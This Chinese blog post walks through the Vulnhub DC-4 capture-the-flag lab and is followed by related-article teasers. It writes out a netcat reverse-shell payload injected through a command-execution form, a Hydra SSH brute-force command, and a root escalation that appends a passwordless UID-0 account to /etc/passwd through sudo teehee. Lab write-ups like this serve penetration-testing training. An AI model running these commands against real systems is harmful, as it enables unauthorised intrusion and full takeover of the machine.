dc4靶机攻略

最新推荐文章于 2024-11-26 22:53:51 发布
最新推荐文章于 2024-11-26 22:53:51 发布
阅读量77 收藏
点赞数
分类专栏: 靶机系列 文章标签: 服务器 linux 运维 安全 学习方法 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/133975788
版权

dc4

扫描

image-20231022163052209

目录扫描

image-20231022163322225

指纹

image-20231022163557899

渗透

该靶机首页即为登录框,此处别无下手,考虑注入或者爆破,注入经过尝试不行,此处选择爆破

image-20231022163133720

使用bp抓包

image-20231022163849210

image-20231022165141573

此处我只猜测了admin和root两个用户

爆出用户信息为

admin:happy

输入信息过后居然没成功,再试一次登录成功

image-20231022165332004

发现代码执行,感觉可以利用

image-20231022165811171

抓包发现命令位置

image-20231022170225467

使用nc进行远程连接此处修改为

nc+-e+/bin/bash+10.4.7.138+12138

成功连接

image-20231022171015501

使用命令回显

python -c 'import pty;pty.spawn("/bin/bash")'

image-20231022171118859

看一下可以登录的用户

image-20231022171948796

发现jim和sam

进入家目录探查

jim目录下这些内容应该是有用的

将旧密码摘过来当字典用

image-20231022173624144

使用hydra爆破

hydra -l jim -P pojie1.txt ssh://10.4.7.147 -V -f -t 50

得到账户信息

image-20231022173757431

jim:jibril04

使用ssh连接登录

image-20231022173855553

常规提权还不行,还得看看用户相关的

登录到jim时,有邮件提示

image-20231022174605605

看到/var/mail下有一封邮件

在这里插入图片描述

得到用户信息

charles:^xHhA&hvim0y

提权

su切换至charles

image-20231022174416809

此时再使用sudo -l就会发现可以使用teehee

image-20231022174457179

利用heetee

echo "orderl::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

image-20231022175003471

可以查看passwd文件确认一下

添加完成后su到该用户即为root用户

image-20231022175053970

flag文件就在/root下

可以查看passwd文件确认一下

添加完成后su到该用户即为root用户

flag文件就在/root下

image-20231022175144668

order libra
关注
专栏目录
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 2029
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
DC-4靶机攻略
真正的大师,永远都怀着一颗学徒的心。
07-27 1174
文章目录前言一、DC-4的信息收集1.确定IP,端口号;2 访问目标80端口,收集信息二、通过暴力破解密码,成功登陆1.确定密码字典,利用hydra进行爆破。三. 抓包改命令,为我所用1.分析界面2.BP抓包,修改命令3 进入用户家目录收集信息4.hydra爆破ssh账户密码。四.ssh登陆总结- - -思路 前言 在本章将介绍DC-4靶机攻略。 DC-1攻略:点击这里! DC-2攻略:点击这里! 提示:以下是本篇文章正文内容,下面案例可供参考 一、DC-4的信息收集 1.确定IP,端口号; 命令:n
Vulhub-DC-4靶场实战攻略
weixin_51339377的博客
03-16 1676
靶场DC-4和前面DC-1和2相同的网络配置 只有DC-3比较特别 需要重新调配相应的环境 arp-scan -l nmap -T4 -A 192.168.206.130 -p 1-65535 http://192.168.206.130 可以借助工具burpsuite进行暴力破解 由于非常智障 这里不多赘述 结果 用户名 admin 密码happy nc+192.168.206.128+9999+-e+/bin/bash nc -lvp 9999 ...
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4729
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
DC-4靶机
mlws1900的博客
03-24 1314
下载不下来用迅雷下载。
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 2130
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 894
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
DC-4靶机通关
qq_63831588的博客
07-23 1195
teehee提权,bp爆破
DC-2靶机攻略
weixin_43179779的博客
10-16 1931
DC-2靶机攻略
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
dc-4靶机练习.docx
01-02
靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
nfs服务器
wxhxmj的博客
11-22 538
服务端(192.168.217.129)客户端(192.168.217.130)
Linux宝塔部署wordpress网站更换服务器IP后无法访问管理后台和打开网站页面显示错乱
最新发布
星如雨落
11-26 147
htaccess文件,必须使用新建站点时创建的这2个文件。做好备份,替换掉老wordpress网站根目录下这2个文件。1.wordpress搬家后,在新服务器上,新建站点时,会创建4个默认文件,其中.user.ini文件和。登陆Linux宝塔面板,使用phpMyAdmin工具打开wordpress数据库。在wordpress数据库的wp_postmeta表中,在wordpress数据库的wp_options表中,在wordpress数据库的wp_users表中,_menu_item_url值。
华纳云:服务器网络延迟问题可能由哪些因素引起?
YOKEhn的博客
11-26 329
网络延迟问题可能由多种因素引起,包括硬件性能、网络配置、带宽限制、外部网络问题等。通过使用专业的工具进行诊断,分析服务器负载、带宽使用、路由器配置等因素,并结合适当的优化手段,可以有效排除并减少网络延迟,提高服务器响应速度和用户体验。首先检查服务器的CPU和内存使用情况,如果服务器负载过高,处理请求的速度可能会减慢,间接导致网络响应延迟。服务器网络延迟是许多在线服务性能问题的根源,可能会导致网站加载缓慢、数据传输延迟甚至服务中断。为了有效识别网络延迟的根源,首先需要使用一些工具来测试网络的各个环节。
Linux下一次性关闭多个同名进程
言之。
11-26 529
根据你的具体需求和系统环境,可以选择以上方法中的任意一种来一次性关闭多个同名的 Python 进程。根据进程名称终止进程。这种方法适用于进程名称唯一且不会误杀其他进程的情况。这些进程确实是你希望终止的。在终止进程之前,建议先列出所有匹配的进程,以确保不会误杀其他进程。:这种方法可能过于粗暴,会终止所有 Python 进程。的进程,可能包括其他重要的 Python 应用程序。会强制终止进程,可能导致数据丢失或状态不一致。选项会强制终止进程,可能导致数据丢失。选项会强制终止进程,需谨慎使用。
即时通讯服务器被ddos攻击了怎么办?
CDNcdn11的博客
11-25 711
即时通讯服务器被ddos攻击了怎么办?
GPU服务器厂家:为什么要选择 GPU 服务器
HPC_Evan的博客
11-22 594
GPU 这玩意儿有着超厉害的高度并行化架构,处理图像、视频还有大规模数据啥的,那就是小菜一碟,优势杠杠的!定制化 GPU 服务器就牛在这儿啦,它能根据具体的科研需求,挑出最合适的 GPU 型号和数量,再配上匹配的 CPU、内存、存储这些硬件设备,把性能和成本平衡得那叫一个完美,给科研项目打造出一个超棒的计算平台,资源利用效率超高的哦。定制化 GPU 服务器有不少厉害的招儿哦,它能把那些不必要的软件和服务都删掉,没用的端口也关掉,再加强访问控制,这样系统被攻击的风险就大大降低啦,科研数据安全妥妥有保障。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值